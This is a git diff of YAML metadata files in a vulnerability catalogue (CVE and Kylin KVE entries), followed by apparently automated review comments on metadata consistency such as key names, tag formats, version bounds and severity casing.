diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml index 1112f170b607c15cf3044a62ddd9e8e4d7085ea3..3eddcac3ba9fe575138dfd2846a4d688df89669e 100644 --- a/cve/webmin/2019/yaml/CVE-2019-12840.yaml +++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml @@ -10,7 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-12840 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-12840 cwe-id: CWE-78 diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c4dfe862200d680cff85dda2a1537ef4e..1a2157230b101f278f6fb5e029aeff9993fa8024 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,6 +1,5 @@ id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 +source: https://github.com/L0ading-x/cve-2022-23131 info: name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 severity: critical diff --git a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml index 8101adfa65637945d894c69be075d12ec0a33598..b4bed45fbafc5e80b9dff034d66151c36e9bc38e 100644 --- a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml +++ b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0231 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml index d3512bf6a909a4788e1c9a029d3f462b28320f65..9a2e69d5ff88f8ab4b724607f5226241a8f430a1 100644 --- a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml +++ b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml 
@@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0206 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml index 509a3d1ff549bdb6d59c1486ce3454325381790f..d52ead9b557306b198bfd493a4412a773e9bb0dd 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0207 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml index df9264e57bd687c2284269c08b64bb027bad2f32..bbcd86e9ff325d91ff0a1d5d21001f9107f7d17c 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0210 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml index 0e9b92df4c8cf3fd4601127de93a1bb1375e2579..bf1585c3b7388fc81744a82e0d0616fef0e61a02 100644 --- a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml +++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0205 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index ea9254993a1143b2ef3a3f4c841b1f2516f4128b..819961a3d1a6ab7f04cc6d71437ace2097568d57 100644 --- a/other_list.yaml +++ b/other_list.yaml 
@@ -8,7 +8,6 @@ cve: - CVE-2021-42327 - CVE-2022-0995 - CVE-2022-1015 - - CVE-2022-2602 - CVE-2022-2586 - CVE-2021-33624 - CVE-2020-27194
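Review bot: in cve/linux-kernel/2022/yaml/CVE-2022-25636.yaml the `cnvd-id` line replaces `CNNVD-202202-1743` with `None`, and CVE-2022-32250.yaml does the same with `CNNVD-202206-407`, so both cross-references are lost. The values carry a CNNVD prefix and did not belong in a `cnvd-id` field, so clearing the field is reasonable, but keep the identifiers somewhere, for example as a `reference` entry in the same form as the cnnvd.org.cn search link used in CVE-2023-0045.yaml.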
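Review bot: cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml is deleted, and its entry is dropped from other_list.yaml, rather than having its placeholder fields fixed (`cvss-metrics: CVSS:3.1`, `cvss-score: 漏洞评分`). CVE-2022-1771.yaml in this same patch gets its `漏洞评分` placeholder replaced with a real score, so the different treatment needs a reason in the commit message. If the entry is being retired, confirm that nothing else in the tree still refers to it.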
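Review bot: in cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml the rewritten keys `scopeOfInfluence` and `references` do not match the `scope-of-influence` and `reference` keys used by the other kernel entries in this patch, so a consumer keyed on the hyphenated names will see this entry as having no scope and no references (CVE-2023-22809.yaml keeps the same `references` spelling). Rename both. The hunk also removes the whole `SiteRequests` block, including the `Inter` check for `uid=0(root)`, without a replacement; state whether automated verification for this entry is moving elsewhere or is intentionally dropped.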
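Review bot: the new `scope-of-influence` value in cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml, `linux kernel < 5.17-rc5`, disagrees with the description two lines above it, which says versions before 5.16.15 are affected and whose first reference is ChangeLog-5.16.15. Pick one bound and make both fields agree. The product token is also spelled three ways across this patch (`linux kernel`, `Linux kernel`, `Linux-Kernel`); settle on one if the field is meant to be matched by tooling.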
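Review bot: the scope line added in cve/linux-kernel/2022/yaml/CVE-2022-34918.yaml, `5.8.0 ≤ Linux kernel ≤ 5.18.9`, uses the non-ASCII `≤` character while most other scope lines in the patch use plain `<`. If this field is ever compared or parsed by a script, ASCII `<=` is safer and easier to type. For the same reason the scope in cve/openssl/2022/yaml/CVE-2022-0778.yaml, which this patch only moves to its own line, should be brought into the same comparison form instead of staying as free text.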
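Review bot: the rename of `yaml/ CVE-2022-36946.yaml` rewrites all 18 lines even though most removed and added lines are textually identical, which points to a line-ending or whitespace normalization mixed into the content change. The real edits (`severity: 高危` to `High`, the scope line, and the three added id fields) are hard to pick out as a result; put the normalization in its own commit or mention it in the message. Severity casing also differs between files in this patch (`High`, `high`, `HIGH`, `critical`) and should be unified if consumers compare the value.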
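Review bot: in cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml the `reference` list loses the docs.kernel.org spec_ctrl page and the elixir.bootlin.com link to `bugs.c#L1467`, the only pointers from this entry to the affected mitigation code. Fixing the mistaken `keyword=CVE-2023-0179` search link is correct, but keep the two technical references alongside the new NVD link. The vector also changes from `AV:L/.../C:H/I:H/A:H` to `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` while the description still talks about the `prctl` system call and user-space mitigations; cite the source of the new vector so the two can be reconciled.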
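Review bot: the `tags` change in cve/python/2022/yaml/CVE-2022-30286.yaml turns a YAML sequence (`tags:` followed by `- Source Codes Read`) into a plain string, and the same happens in CVE-2022-35411.yaml, CVE-2023-22809.yaml and CVE-2022-2639.yaml. That changes the parsed type from list to string, so any loader that iterates over `tags` will now iterate over characters or fail. Confirm that the schema and every consumer expect a single comma-separated string and split on `, `.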
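Review bot: the second hunk of cve/samba/2021/yaml/CVE-2021-44142.yaml normalizes `tags` to `cve2021, samba, RCE` but leaves the context line `cwe-id: CWE-125,CWE-787` without the space that the polkit and vim `cwe-id` lines receive elsewhere in this patch. Apply the same `, ` separator here so that one splitting rule works for every entry.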
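Review bot: the rewritten description in cve/vim/2023/yaml/CVE-2023-1127.yaml, `vim在9.0.1367版本存在除以零漏洞。`, says the flaw exists in version 9.0.1367, while the unchanged scope line directly below says `vim < 9.0.1367`. The edit only removes the "GitHub存储库vim/vim" prefix and carries the contradiction over. Add `之前` so the description reads as "before 9.0.1367" and agrees with the scope.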